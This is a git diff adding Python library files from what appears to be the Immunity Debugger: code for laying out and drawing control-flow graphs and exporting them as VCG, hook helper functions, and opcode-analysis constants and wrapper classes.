+ edgelist.append((tx2,ty2,tx2,ych-2,color))
+
+ #add endpoint
+ addEndPointToEdge(edgelist)
+
+
+ elif child[1] == 2 : #false child
+ for vertexchild in vertices:
+ if child[0] == vertexchild.getName():
+ if vertex.getName() == vertexchild.getName():
+ # parent = child, then loop in same vertex
+ debugger.Error("loop false")
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y-1,parentw*1/4+x+chaosmov,parenth+y+5,"red"))
+ edgelist.append((parentw*1/4+x+chaosmov,parenth+y+5,x-14,parenth+y+5,"red"))
+ edgelist.append((x-14,parenth+y+5,x-14,y-10,"red"))
+ edgelist.append((x-14,y-10,parentw*1/4+x+chaosmov,y-10,"red"))
+ edgelist.append((parentw*1/4+x+chaosmov,y-10,parentw*1/4+x+chaosmov,y-1,"red"))
+
+ else:
+ (xch,ych,x2ch,y2ch) = vertexchild.getCoords()
+ childw=vertexchild.getWidth()
+ chaosmov=randint(0, 5)
+ if (parenth+y-1) > ych-2-25: # go north
+ edgelist.append((parentw*3/4+x+chaosmov,parenth+y-1,parentw*3/4+x+chaosmov,parenth+y+5,"Blue"))
+ edgelist.append((parentw*3/4+x+chaosmov,parenth+y+5,x2+14,parenth+y+5,"Blue"))
+ edgelist.append((x2+14,parenth+y+5,x2+14,ych-2-20+chaosmov,"Blue"))
+ edgelist=searchForDummyPathsH2North(edgelist,vertices)
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx2,ty2,xch+(childw*1/2)+chaosmov,ty2,color))
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ if ty2 < y2ch:
+ edgelist.append((tx2,ty2,tx2,ych-2,color)) #last stroke enters from north
+ else:
+ edgelist.append((tx2,ty2,tx2,y2ch-2,color)) # last stroke enters from south
+ else: #go south
+ edgelist.append((parentw*3/4+x+chaosmov,parenth+y-1,parentw*3/4+x+chaosmov,ych-2-25+chaosmov,"red"))
+ edgelist=searchForDummyPathsH2South(edgelist,vertices)
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx,ty2,xch+(childw*1/2)+chaosmov,ty2,color))
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx2,ty2,tx2,ych-2,color))
+ edgelist=searchForDummyPathsH2South(edgelist,vertices)
+ #add endpoint
+ addEndPointToEdge(edgelist)
+
+
+
+
+
+
+ elif child[1] == 0 : #direct child
+ for vertexchild in vertices:
+ if child[0] == vertexchild.getName():
+ if vertex.getName() == vertexchild.getName():
+ # parent = child, then loop in same vertex
+ debugger.Error("loop direct")
+ else:
+ (xch,ych,x2ch,y2ch) = vertexchild.getCoords()
+ f.write("Edge direct from %s (%d,%d,%d,%d) to %s (%d,%d,%d,%d)\n" % (vertex.getName(),x,y,x2,y2,vertexchild.getName(),xch,ych,x2ch,y2ch))
+ chaosmov=randint(-5, 5)
+ chaosmovlastx=randint(-20,20)
+ childw=vertexchild.getWidth()
+ if (parenth+y-1) > ych-2-25: # go north
+ edgelist.append((parentw*1/2+x+chaosmov,parenth+y-1,parentw*1/2+x+chaosmov,parenth+y+5,"Blue"))
+ edgelist.append((parentw*1/2+x+chaosmov,parenth+y+5,x-10,parenth+y+5,"Blue"))
+ edgelist.append((x-10,parenth+y+5,x-10,ych-2-20+chaosmov,"Blue"))
+ edgelist=searchForDummyPathsH2North(edgelist,vertices)
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx2,ty2,xch+(childw*1/2)+chaosmov,ty2,color))
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ if ty2 < y2ch:
+ edgelist.append((tx2,ty2,tx2,ych-2,color)) #last stroke enters from north
+ else:
+ edgelist.append((tx2,ty2,tx2,y2ch-2,color)) # last stroke enters from south
+
+ else: # go south
+ edgelist.append((parentw*1/2+x+chaosmov,parenth+y-1,parentw*1/2+x+chaosmov,ych-2-25+chaosmov,"Black"))
+ edgelist=searchForDummyPathsH2South(edgelist,vertices)
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx,ty2,xch+(childw*1/2)+chaosmov,ty2,color))
+ (tx,ty,tx2,ty2,color) = edgelist[-1]
+ edgelist.append((tx2,ty2,tx2,ych-2,color))
+
+
+
+ #add endpoint
+ addEndPointToEdge(edgelist)
+
+
+
+ return edgelist
+
+def addEndPointToEdge(edgelist):
+ (endx,endy,endx2,endy2,color)=edgelist[-1]
+ edgelist.append((endx2,endy2,endx2,endy2+2,color))
+ edgelist.append((endx2,endy2,endx2,endy2-2,color))
+ edgelist.append((endx2,endy2+2,endx2+2,endy2+2,color))
+ edgelist.append((endx2,endy2+2,endx2-2,endy2+2,color))
+ edgelist.append((endx2+2,endy2-2,endx2+2,endy2+3,color))
+ edgelist.append((endx2-2,endy2-2,endx2-2,endy2+3,color))
+ edgelist.append((endx2-2,endy2-2,endx2+2,endy2-2,color))
+
+ return edgelist
+
+def drawVertices(vertices):
+ startx=None
+ for vertex in vertices:
+ if vertex.isDrawn() == False:
+ if startx==None:
+ startx=1
+ else:
+ startx=0
+ checkForPlacedVertex(vertex,vertices)
+ (x,y)=vertex.getRelPos()
+ vertex.placeVertex(x,y,vertex.getVertexBuffer(),"Black","Gray",startx)
+ vertex.setDrawn()
+
+ return
+
+def drawEdges(edgelist,handler):
+ for line in edgelist:
+ linej=graphclass.Line(handler)
+ x_pos=line[0]
+ y_pos=line[1]
+ x_to=line[2]
+ y_to=line[3]
+ color=line[4]
+ linej.draw(x_pos,y_pos,x_to,y_to,color)
+ return
+
+
+# handles edges - re-done for new parser
+def createAdjacencyList(G, vertices, edges):
+ """ creates a directed adjacency list for every vertex """
+ for edge in edges:
+ source = edge['sourcename:']
+ target = edge['targetname:']
+
+ type = 0
+ if 'label:' in edge:
+ if 'TRUE' in edge['label:'].upper():
+ type = 1
+ if 'FALSE' in edge['label:'].upper():
+ type = 2
+
+ G.addEdges((source, target, type))
+
+ for vertex in vertices:
+ if vertex.getName() == source:
+ vertex.addOutAdj(target, type)
+ if vertex.getName() == target:
+ vertex.addInAdj(source)
+ return
+
+# for a in range(1,len(buf)):
+# if buf[a][:7] == "edge: {":
+# edge=buf[a].split("\n")
+# for b in edge:
+# if len(b) > 1:
+# parse=b.split("\"")
+# source=parse[1]
+# target=parse[3]
+# type=0
+# if len(parse) == 7:
+# if parse[5] == "true":
+# type=1
+# elif parse[5] == "false":
+# type=2
+# G.addEdges((source,target,type))
+# #print "source: " + source + " target : " + target
+# for vertex in vertices:
+# if vertex.getName() == source:
+# vertex.addOutAdj(target,type)
+# elif vertex.getName() == target:
+# vertex.addInAdj(source)
+# return
+
+def checkPlanarity(vertices):
+ #for a in range(0,10):
+ #for vertex in vertices:
+ #checkForPlacedVertex(vertex,vertices)
+ return
+
+def firstAttemptToPlace(vertices):
+ """First attempt to place vertices
+ We are going to suppose Graph is planar and
+ attempt to place vertices directly,
+ in real world this wont happens, but at least
+ we'll have temptative coords for every vertex"""
+
+ for vertex in vertices:
+ if vertices.index(vertex) == 0 :
+ (x,y)=vertex.getStartCoords()
+ vertex.setRelPos(x,y)
+ (x,y,x2,y2)=vertex.getCoords()
+ vertex.setPlaced()
+ (x,y)=vertex.getRelPos()
+ #vertex.placeVertex(x,y,vertex.getVertexBuffer(),"Black","Gray",0)
+ outadj=vertex.getOutAdj()
+ #immlib.Error("Parent: %s" % str(vertex.getName()))
+ if len(outadj) > 0: #dont do if no childs
+ for child in outadj:
+ if child[1] == 1:
+ for vertexchild in vertices:
+ if child[0] == vertexchild.getName() and vertexchild.isPlaced() == False:
+ (xp,yp)=vertex.getRelPos()
+ if xp == 0: #this means that no parent is still defined, maybe a recursive cycle?
+ #immlib.Error("recursive cycle? check inadj list true")
+ """Note: usually we dont want to go back from Point of No Return,
+ but in this special case of vertex, we need to do it.
+ we should have in mind, that overlapping might occur, but we wont move south , instead
+ we need to move east/west"""
+ inadj=vertex.getInAdj()
+ for parent in inadj:
+ for parentvertex in vertices:
+ if parent == parentvertex.getName():
+ (xp,yp)=parentvertex.getRelPos()
+ y=yp+parentvertex.getHeight()+55
+ x=xp-(parentvertex.getWidth()*0.75)
+ x=xp-100
+ vertexchild.setRelPos(x,y)
+ #checkForPlacedVertex(vertexchild, vertices)
+ vertexchild.setPlaced()
+ else:
+
+ y=yp+vertex.getHeight()+55
+ #x=xp-(vertex.getWidth()*0.75)
+ x=xp-100
+ vertexchild.setRelPos(x,y)
+ checkForPlacedVertex(vertexchild, vertices)
+ vertexchild.setPlaced()
+
+ #immlib.Error("Child True: %s\nx: %s\ny:%s\nParent:%s %s, %s" % (str(child[0]),str(x),str(y),vertex.getName(),str(xp),str(yp)))
+ elif child[1] == 2 :
+ for vertexchild in vertices:
+ if child[0] == vertexchild.getName() and vertexchild.isPlaced() == False:
+ (xp,yp)=vertex.getRelPos()
+ if xp == 0:
+ """special case"""
+ #immlib.Error("recursive cycle? check inadj list false")
+ inadj=vertex.getInAdj()
+ #immlib.Error(str(inadj))
+ for parent in inadj:
+ for parentvertex in vertices:
+ if parent == parentvertex.getName():
+ (xp,yp)=parentvertex.getRelPos()
+ y=yp+parentvertex.getHeight()+15
+ #x=xp+(parentvertex.getWidth()*0.75)
+ x=xp+parentvertex.getWidth()+50
+ vertexchild.setRelPos(x,y)
+ #checkForPlacedVertex(vertexchild, vertices)
+ vertexchild.setPlaced()
+
+ else:
+ y=yp+vertex.getHeight()+55
+ #x=xp+(vertex.getWidth()*0.75)
+ x=xp+vertex.getWidth()+50
+ vertexchild.setRelPos(x,y)
+ checkForPlacedVertex(vertexchild, vertices)
+ vertexchild.setPlaced()
+
+ #immlib.Error("Child False: %s\nx: %s\ny:%s\nParent:%s %s, %s" % (str(child[0]),str(x),str(y),vertex.getName(),str(xp),str(yp)))
+
+ if child[1] == 0 :
+ for vertexchild in vertices:
+ if child[0] == vertexchild.getName() and vertexchild.isPlaced() == False:
+ (xp,yp)=vertex.getRelPos()
+ if xp == 0:
+ """special case"""
+ #immlib.Error("recursive cycle? check inadj list direct")
+ inadj=vertex.getInAdj()
+ #immlib.Error(str(inadj))
+ for parent in inadj:
+ for parentvertex in vertices:
+ if parent == parentvertex.getName():
+ (xp,yp)=parentvertex.getRelPos()
+ y=yp+parentvertex.getHeight()+55
+ x=xp+(parentvertex.getWidth()/2)
+ vertexchild.setRelPos(x,y)
+ #checkForPlacedVertex(vertexchild, vertices)
+ vertexchild.setPlaced()
+
+
+ else:
+ y=yp+vertex.getHeight()+55
+ x=xp+(vertex.getWidth()/2)
+ vertexchild.setRelPos(x,y)
+ checkForPlacedVertex(vertexchild, vertices)
+ vertexchild.setPlaced()
+
+ #immlib.Error("Child Direct: %s\nx: %s\ny:%s\nParent:%s %s, %s" % (str(child[0]),str(x),str(y),vertex.getName(),str(xp),str(yp)))
+
+ return
+
+
+
+
+
+def checkForPlacedVertex(vertex2check,vertices):
+
+ """Note: needs to divide graph in layers
+
+ Draft notes:
+ step 1 get temptative coords to place vertex
+ step 2 check if coords overlaps already placed vertex
+
+ step 2 a)
+ first we have to check if (y,y2) of vertex is in range of the placed vertex,
+
+ if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+
+ if that condition is true, means we have a vertex in the same y that an already placed vertex, so it might be
+ possible of an overlapping to exists, so we are going to ask:
+
+ if x >= xp and x <= x2p:
+ if that condition is true, then we have an overlapping over the y coord of the vertex (left point)
+
+ if x2 >= xp and x <= x2p:
+ if that condition is true, then we have an overlapping over the y coord of the vertex (right point)
+
+ and if does, check whether x or x2 is overlapping
+ once we know that, we need to check wheter x or x2 of overlapped vertex is touched
+ if x , move west x - 10 and recheck
+ """
+ ret=False
+ (x,y,x2,y2) = vertex2check.getCoords()
+ for vertex in vertices:
+ if vertex.getName() == vertex2check.getName() :
+ pass
+ else:
+ if 1 == 1:
+ (xp,yp,x2p,y2p) = vertex.getCoords()
+ if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+ #immlib.Error("%s and %s are in the same x range" % (vertex.getName(),vertex2check.getName()))
+ if x >= xp and x <= x2p:
+ #immlib.Error("%s and %s overlaps LEFT: %d" % (vertex.getName(),vertex2check.getName(),x2p-x))
+ vertex2check.moveSouth(y2p-y+25)
+ (xp,yp,x2p,y2p) = vertex.getCoords()
+ (x,y,x2,y2) = vertex2check.getCoords()
+ ret=True
+ if x2 >= xp and x <= x2p:
+ #immlib.Error("%s and %s overlaps RIGHT" % (vertex.getName(),vertex2check.getName()))
+ vertex2check.moveSouth(y2p-y+25)
+ (xp,yp,x2p,y2p) = vertex.getCoords()
+ (x,y,x2,y2) = vertex2check.getCoords()
+ ret=True
+ return ret
+
+def checkForPlacedVertex2(vertex2check,vertices):
+
+ """Note: needs to divide graph in layers
+
+ Draft notes:
+ step 1 get temptative coords to place vertex
+ step 2 check if coords overlaps already placed vertex
+
+ step 2 a)
+ first we have to check if (y,y2) of vertex is in range of the placed vertex,
+
+ if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+
+ if that condition is true, means we have a vertex in the same y that an already placed vertex, so it might be
+ possible of an overlapping to exists, so we are going to ask:
+
+ if x >= xp and x <= x2p:
+ if that condition is true, then we have an overlapping over the y coord of the vertex (left point)
+
+ if x2 >= xp and x <= x2p:
+ if that condition is true, then we have an overlapping over the y coord of the vertex (right point)
+
+ and if does, check whether x or x2 is overlapping
+ once we know that, we need to check wheter x or x2 of overlapped vertex is touched
+ if x , move west x - 10 and recheck
+ """
+ ret=False
+ (x,y,x2,y2) = vertex2check.getCoords()
+ for vertex in vertices:
+ if vertex.getName() == vertex2check.getName() :
+ pass
+ else:
+ if 1 == 1:
+ (xp,yp,x2p,y2p) = vertex.getCoords()
+ if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+ immlib.Error("%s and %s are in the same x range" % (vertex.getName(),vertex2check.getName()))
+ if x >= xp and x <= x2p:
+ immlib.Error("%s and %s overlaps LEFT: %d" % (vertex.getName(),vertex2check.getName(),x2p-x))
+ vertex2check.moveSouth(20)
+ (xp,yp,x2p,y2p) = vertex.getCoords()
+ (x,y,x2,y2) = vertex2check.getCoords()
+ ret=True
+ if x2 >= xp and x <= x2p:
+ vertex2check.moveSouth(20)
+ immlib.Error("%s and %s overlaps RIGHT" % (vertex.getName(),vertex2check.getName()))
+ (xp,yp,x2p,y2p) = vertex.getCoords()
+ (x,y,x2,y2) = vertex2check.getCoords()
+ ret=True
+ return ret
+
+
+def defineVertexRelation(vertices):
+ #first vertex coords
+ #x=300
+ #y=10
+ #vertices[0].setRelPos(x,y)
+
+ #vertices[0].placeVertex(x,y,vertices[0].getVertexBuffer(),"Black","Blue",0)
+
+ #draw[0].draw(draw[1],draw[2],draw[0].getNodeBuffer(),"Black","Blue",startx)
+ return
+
+# XXX: if it's rainy out, re-do this too ...
+def generateVCG(address):
+ """ this function will generate a vcg compatible buffer to create the graph """
+ imm = immlib.Debugger()
+ ret = imm.getFunctionBegin(address)
+ if ret:
+ address = ret
+ f = imm.getFunction(address)
+ buf=[]
+ buf.append('graph: {\x0d\x0a')
+ buf.append('title: "Graph of %s (0x%08x)"\r\n' % (f.getName(),int(f.start)))
+ buf.append("//default palette\r\n")
+ ### add the default palette
+ buf += PALETTE
+ basicblocks = f.getBasicBlocks()
+ basicblocks.sort()
+ #first basicblock
+ buf.append('node: { title: "0x%08x" vertical_order: 0 label: "\x0c69%s (0x%08x):\x0c31\r\n' % (int(basicblocks[0].start),f.getName(),int(f.start)))
+ instr=basicblocks[0].getInstructions(imm)
+ for i in instr:
+ if len(i.comment) > 0:
+ buf.append("%s || %s\r\n" % (i.result,i.comment.replace("\"","")))
+ else:
+ buf.append("%s\r\n" % i.result)
+ buf.append("\"")
+
+ #from second the last one -1 basicblocks
+
+ for a in range(1,len(basicblocks)):
+ buf.append(" }\n")
+ buf.append('node: { title: "0x%08x" label: "\x0c69 0x%08x\x0c31\n' % (int(basicblocks[a].start),int(basicblocks[a].start)))
+ instr=basicblocks[a].getInstructions(imm)
+ for i in instr:
+ if len(i.comment) > 0:
+ buf.append("%s || %s\r\n" % (i.result,i.comment.replace("\"","")))
+ else:
+ buf.append("%s\r\n" % i.result)
+
+ buf.append('"\r\n')
+
+ buf.append("}\r\n" )
+ #generate edges list
+ buf.append("//nodes edges\r\n")
+ for a in range(0,len(basicblocks)-1):
+ (true,false) = basicblocks[a].getEdges()
+ if false != 0:
+ buf.append('edge: { sourcename: "0x%08x" targetname: "0x%08x" label: "false" color: red }\r\n' % (int(basicblocks[a].start),int(basicblocks[a].end)))
+ buf.append('edge: { sourcename: "0x%08x" targetname: "0x%08x" label: "true" color: darkgreen }\r\n' % (int(basicblocks[a].start),int(true)))
+ else:
+ buf.append('edge: { sourcename: "0x%08x" targetname: "0x%08x" }\r\n' % (int(basicblocks[a].start),int(true)))
+ buf.append("\n}\r\n")
+ return buf
+
+
+def saveVCG(address,filename):
+ vcg_buf=generateVCG(address)
+ if len(vcg_buf) > 0:
+ fd=open(filename,"wb")
+ for a in vcg_buf:
+ fd.write(a)
+ fd.close()
+ else:
+ debugger.Error("There is no VCG graph")
+
+
+if __name__=="__main__":
+ main()
diff --git a/1.73/Libs/internals.py b/1.73/Libs/internals.py
new file mode 100755
index 0000000..9f4a394
--- /dev/null
+++ b/1.73/Libs/internals.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+Internal libs
+
+
+"""
+
+__VERSION__ = '1.0'
+
+import pickle
+import immlib
+
+
+
+
+def hookmain(pickled_hook,regs):
+ """Auxiliar hook function
+ get pickled hook instance and execute run()"""
+ imm= immlib.Debugger()
+ hook=pickle.loads(pickled_hook)
+ if hook.enabled==True: #only enabled hooks will execute
+ hook._run(regs) #be sure this method is actually the one you want executed with your hook
+
+
+def hookmaintimeout(pickled_hook,regs):
+ """Auxiliar hook function
+ get pickled hook instance and execute runtimeout()"""
+ imm= immlib.Debugger()
+ hook=pickle.loads(pickled_hook)
+ if hook.enabled==True: #only enabled hooks will execute
+ hook._runTimeout(regs) #be sure this method is actually the one you want executed with your hook
+
+
+
+
+def addGenHook(object):
+ imm=immlib.Debugger()
+ imm.addGenHook(object)
+ del imm
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Libs/libanalyze.py b/1.73/Libs/libanalyze.py
new file mode 100755
index 0000000..89207dd
--- /dev/null
+++ b/1.73/Libs/libanalyze.py
@@ -0,0 +1,1078 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+"""
+
+__VERSION__ = '1.3'
+
+import UserList
+import debugger
+
+# REGISTER STATUS
+RST_INVALID = 0 # Register undefined
+RST_VALUE = 1 # Register contains regdata
+RST_VFIXUP = 2 # Reg contains regdata that is fixup
+RST_INDIRECT = 3 # Register contains [regdata]
+
+
+# DISASM MODE
+DISASM_SIZE = 0 # Determine command size only
+DISASM_DATA = 1 # Determine size and analysis data
+DISASM_TRACE = 2 # Trace integer registers
+DISASM_FILE = 3 # Disassembly, no symbols/registers
+DISASM_CODE = 4 # Disassembly, registers undefined
+DISASM_ALL = 5 # Completely disassembly
+DISASM_RTRACE = 6 # Disassemble with run-trace registers
+
+# Types for Opcode
+C_TYPEMASK = 0xF0 # Mask for command type
+C_CMD = 0x00 # Ordinary instruction
+C_PSH = 0x10 # PUSH instruction
+C_POP = 0x20 # POP instruction
+C_MMX = 0x30 # MMX instruction
+C_FLT = 0x40 # FPU instruction
+C_JMP = 0x50 # JUMP instruction
+C_JMC = 0x60 # Conditional JUMP instruction
+C_CAL = 0x70 # CALL instruction
+C_RET = 0x80 # RET instruction
+C_FLG = 0x90 # Changes system flags
+C_RTF = 0xA0 # C_JMP and C_FLG simultaneously
+C_REP = 0xB0 # Instruction with REPxx prefix
+C_PRI = 0xC0 # Privileged instruction
+C_SSE = 0xD0 # SSE instruction
+C_NOW = 0xE0 # 3DNow! instruction
+C_BAD = 0xF0 # Unrecognized command
+
+# Decode type
+DEC_TYPEMASK = 0x1F # Type of memory byte
+DEC_UNKNOWN = 0x00 # Unknown type
+DEC_BYTE = 0x01 # Accessed as byte
+DEC_WORD = 0x02 # Accessed as short
+DEC_NEXTDATA = 0x03 # Subsequent byte of data
+DEC_DWORD = 0x04 # Accessed as long
+DEC_FLOAT4 = 0x05 # Accessed as float
+DEC_FWORD = 0x06 # Accessed as descriptor/long pointer
+DEC_FLOAT8 = 0x07 # Accessed as double
+DEC_QWORD = 0x08 # Accessed as 8-byte integer
+DEC_FLOAT10 = 0x09 # Accessed as long double
+DEC_TBYTE = 0x0A # Accessed as 10-byte integer
+DEC_STRING = 0x0B # Zero-terminated ASCII string
+DEC_UNICODE = 0x0C # Zero-terminated UNICODE string
+DEC_3DNOW = 0x0D # Accessed as 3Dnow operand
+DEC_SSE = 0x0E # Accessed as SSE operand
+DEC_TEXT = 0x10 # For use in t_result only
+DEC_BYTESW = 0x11 # Accessed as byte index to switch
+DEC_NEXTCODE = 0x13 # Subsequent byte of command
+DEC_COMMAND = 0x1D # First byte of command
+DEC_JMPDEST = 0x1E # Jump destination
+DEC_CALLDEST = 0x1F # Call (and maybe jump) destination
+
+DEC_PROCMASK = 0x60 # Procedure analysis
+DEC_PROC = 0x20 # Start of procedure
+DEC_PBODY = 0x40 # Body of procedure
+DEC_PEND = 0x60 # End of procedure
+
+DEC_CHECKED = 0x80 # Byte was analysed
+DEC_SIGNED = 0x100 # For use in t_result only
+
+DECR_TYPEMASK = 0x3F # Type of register or memory
+DECR_BYTE = 0x21 # Byte register
+DECR_WORD = 0x22 # Short integer register
+DECR_DWORD = 0x24 # Long integer register
+DECR_QWORD = 0x28 # MMX register
+DECR_FLOAT10 = 0x29 # Floating-point register
+DECR_SEG = 0x2A # Segment register
+DECR_3DNOW = 0x2D # 3Dnow! register
+DECR_SSE = 0x2E # SSE register
+
+DECR_ISREG = 0x20 # Mask to check that operand is register
+DEC_CONST = 0x40 # Immediate constant, used by Analyser
+
+Registers32BitsOrder = [ "EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI" ]
+Registers16BitsOrder = [ "AX", "CX", "DX", "BX", "SP", "BP", "SI", "DI" ]
+Registers8BitsOrder = [ "AL", "CL", "DL", "BL", "AH", "CH", "DH", "BH" ]
+
+RegisterName = { (0,0,0,0,0,0,0,0):"", (1,0,0,0,0,0,0,0):"EAX",(0,1,0,0,0,0,0,0):"ECX",\
+ (0,0,1,0,0,0,0,0):"EDX", (0,0,0,1,0,0,0,0):"EBX",(0,0,0,0,1,0,0,0):"ESP",\
+ (0,0,0,0,0,1,0,0):"EBP", (0,0,0,0,0,0,1,0):"ESI", (0,0,0,0,0,0,0,1):"EDI"}
+
+COUNT = 100
+class opCode:
+ def __init__(self, imm, addr):
+ self.imm = imm
+ self.address = addr
+ self.operand = []
+
+
+ def _getfromtuple(self, opcode):
+ self.ip=opcode[0] # Instruction pointer
+ self.dump=opcode[1] # Hexadecimal dump of the command
+ self.result=opcode[2] # Disassembled command
+ self.comment=opcode[3] # Brief comment
+ self.opinfo=opcode[4] # Comments to command's operands (tuple[3])
+ self.cmdtype=opcode[5] # One of C_xxx
+ self.memtype=opcode[6] # Type of addressed variable in memory
+ self.nprefix=opcode[7] # Number of prefixes
+ self.indexed=opcode[8] # Address contains register(s)
+ self.jmpconst=opcode[9] # Constant jump address
+ self.jmptable=opcode[10] # Possible address of switch table
+ self.adrconst=opcode[11] # Constant part of address
+ self.immconst=opcode[12] # Immediate constant
+ self.zeroconst=opcode[13] # Whether contains zero constant
+ self.fixupoffset=opcode[14] # Possible offset of 32-bit fixups
+ self.fixupsize=opcode[15] # Possible total size of fixups or 0
+ self.jmpaddr=opcode[16] # Destination of jump/call/return
+ self.condition=opcode[17] # 0xFF:unconditional, 0:false, 1:true
+ self.error=opcode[18] # Error while disassembling command
+ self.warnings=opcode[19] # Combination of DAW_xxx
+ self.optype=opcode[20] # Type of operand (extended set DEC_xxx) (tuple[3])
+ self.operandsize=opcode[21] # Size of operand, bytes (tuple[3])
+ self.opsize=opcode[22] #common opsize in bytes (this is the one you want, almost sure)
+ self.opgood=opcode[23] # Whether address and data valid (tuple[3])
+ self.opaddr=opcode[24] # Address if memory, index if register (tuple[3])
+ self.opdata=opcode[25] # Actual value (only integer operands) (tuple[3])
+ self.operand=opcode[26] # Full description of operand (tuple[3])
+ #NOTE ABOUT self.operand:
+ #self.operand[n][0] = operand type DEC_xxx (mem), DECR_xxx (reg) or DEC_CONST (const)
+ #self.operand[n][1] = operand size (in bytes)
+ #self.operand[n][2][x] = registers scale
+ # (use Registers32BitsOrder,Registers16BitsOrder,Registers8BitsOrder depending on operand size)
+ # Note: more than one register could be used in some memory addressing modes.
+ #self.operand[n][3] = constant
+
+
+ self.regdata=opcode[27] # Registers after command is executed / status of registers list[(reg,status)]
+ self.addrdata=opcode[28] # Traced memory address
+ self.addrstatus=opcode[29] # Status of addrdata, one of RST_xxx
+ self.regstack=opcode[30] # Stack tracing buffer / status of stack items list[(stack,status)]
+ #self.nregstack=opcode[32] # Number of items in stack trace buffer
+
+ # We need to include more than one register
+ # ex: [EAX+EDI+2]
+ def getOperandRegister(self, num):
+ try:
+ return RegisterName[ self.operand[num][2] ]
+ except KeyError:
+ return "[]"
+
+ def getIP(self):
+ return self.ip
+
+ def getAddress(self):
+ return self.address
+
+ def getDump(self):
+ return self.dump
+
+ def getResult(self):
+ return self.result
+
+ def getDisasm(self):
+ return self.result
+
+ def getComment(self):
+ return self.comment
+
+ def getOpInfo(self):
+ return self.opinfo
+
+ def isCmd(self):
+ return self.getCmdType() == C_CMD
+
+ def isPush(self):
+ return self.getCmdType() == C_PSH
+
+ def isPop(self):
+ return self.getCmdType() == C_POP
+
+ def isCall(self):
+ return self.getCmdType() == C_CAL
+
+ def isJmp(self):
+ return self.getCmdType() == C_JMP
+
+ def isConditionalJmp(self):
+ return self.getCmdType() == C_JMC
+
+ def isRet(self):
+ return self.getCmdType() == C_RET
+
+ def isRep(self):
+ return self.getCmdType() == C_REP
+
+ def getCmd(self):
+ return self.cmdtype
+
+ def getCmdType(self):
+ # types are defined as C_*
+ return self.cmdtype & C_TYPEMASK
+
+ def getMemType(self):
+ return self.memtype
+
+ def getnPrefix(self):
+ return self.nprefix
+
+ def getIndexed(self):
+ return self.indexed
+
+ def getJmpConst(self):
+ return self.jmpconst
+
+ def getJmpTable(self):
+ return self.jmptable
+
+ def getAddrConst(self):
+ return self.adrconst
+
+ def getImmConst(self):
+ return self.immconst
+
+ def getZeroConst(self):
+ return self.zeroconst
+
+ def getFixUpOffset(self):
+ return self.fixupoffset
+
+ def getFixUpSize(self):
+ return self.fixupsize
+
+ def getJmpAddr(self):
+ return self.jmpaddr
+
+ def getCondition(self):
+ return self.condition
+
+ def getError(self):
+ return self.error
+
+ def getWarnings(self):
+ return self.warnings
+
+ def getOpType(self):
+ return self.optype
+
+ def getOpSize(self):
+ return self.opsize
+
+ def getSize(self):
+ return self.opsize
+
+ def getOpGood(self):
+ return self.opgood
+
+ def getOpAddr(self):
+ return self.opaddr
+
+ def getOpData(self):
+ return self.opdata
+
+ def getRegData(self):
+ return self.regdata
+
+ def getRegStatus(self):
+ return self.regdata
+
+ def getAddrData(self):
+ return self.addrdata
+
+ def getAddrStatus(self):
+ return self.addrstatus
+
+ def getRegStack(self):
+ return self.regstack
+
+ def getRstStatus(self):
+ return self.regstack
+
+ def getnRegStack(self):
+ return "deprecated"
+
+ #NOTE: info panel is runtime information, no matter which opcode you use to fetch it
+ # you'll have the info IP linked.
+
+ def getInfoPanel(self):
+ return debugger.Getinfopanel()
+
+ def getVariable(self):
+ return debugger.GetVariable( self.address )
+
+ def setVariable(self, variable_name ):
+ return debugger.SetVariable( self.address, variable_name )
+
+class Decode(UserList.UserList):
+ def __init__(self, address):
+ """
+ Internal Information of the Analyzed Code
+
+ @type address: DWORD
+ @param address: Address in the range of the analized code you want to retrieve
+ """
+ UserList.UserList.__init__(self)
+ self.address = address
+ self.data = debugger.FindDecode( address )
+
+ def __getitem__(self, i):
+ try:
+ return ord( self.data[ i - self.address ] )
+ except IndexError:
+ raise IndexError, "Address 0x%08x not in this Decode" % i
+
+ def __setitem__(self, i, item):
+ self.data[ i - self.address ] = item
+
+ def isJmpDestination(self, i):
+ """
+ Check Whether or not the provided address is a destination for a jmp instruction
+
+ @type i: DWORD
+ @param i: Address to check
+
+ @rtype: BOOLEAN
+ @return: Whether or not the provided address is a destination for a jmp instruction
+ """
+ return ( self.__getitem__( i ) & DEC_TYPEMASK ) == DEC_JMPDEST
+
+ def isCallDestination(self, i):
+ """
+ Check Whether or not the provided address is a destination for a call instruction
+
+ @type i: DWORD
+ @param i: Address to check
+
+ @rtype: BOOLEAN
+ @return: Whether or not the provided address is a destination for a call instruction
+ """
+ return ( self.__getitem__( i ) & DEC_TYPEMASK ) == DEC_CALLDEST
+
+ def isCommand(self, i):
+ """
+ Check Whether or not the provided address has a command (regular opcode)
+
+ @type i: DWORD
+ @param i: Address to check
+
+ @rtype: BOOLEAN
+ @return: Whether or not the provided address a command (regular opcode)
+ """
+ return ( self.__getitem__( i ) & DEC_TYPEMASK ) == DEC_COMMAND
+
+ def isFunctionStart(self, i):
+ """
+ Check Whether or not the provided address is the begging of a Function
+
+ @type i: DWORD
+ @param i: Address to check
+
+ @rtype: BOOLEAN
+ @return: Whether or not the provided address is the begging of a Function
+ """
+ return ( self.__getitem__( i ) & DEC_PROCMASK ) == DEC_PROC
+
+ def isFunctionBody(self, i):
+ """
+ Check Whether or not the provided address is part of a Function
+
+ @type i: DWORD
+ @param i: Address to check
+
+ @rtype: BOOLEAN
